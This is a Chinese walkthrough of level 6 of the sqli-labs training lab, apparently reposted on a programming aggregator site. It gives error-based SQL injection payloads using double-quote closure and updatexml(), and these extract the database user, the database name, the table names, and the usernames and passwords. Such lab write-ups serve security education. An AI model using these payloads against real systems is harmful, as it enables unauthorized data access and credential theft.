概述
less6
这个本质上跟第五关相同都是使用报错注入,这一关使用的是双引号闭合
还是使用updatexml()这个函数
?id=1" union select updatexml(1,concat(0x7e,(select user()),0x7e),1)--+
爆库名:
?id=1" union select updatexml(1,concat(0x7e,(select database()),0x7e),1)--+
爆表名:
?id=1" union select updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema = 'security' limit 0,1),0x7e),1) --+
爆用户名:
?id=1" union select updatexml(1,concat(0x7e,(select group_concat(username) from users),0x7e),1) --+
爆密码:
?id=1" union select updatexml(1,concat(0x7e,(select group_concat(password) from users),0x7e),1) --+
最后
以上就是安详网络为你收集整理的sqli-labs系列——第六关的全部内容,希望文章能够帮你解决sqli-labs系列——第六关所遇到的程序开发问题。
如果觉得靠谱客网站的内容还不错,欢迎将靠谱客网站推荐给程序员好友。
本图文内容来源于网友提供,作为学习参考使用,或来自网络收集整理,版权属于原作者所有。
发表评论 取消回复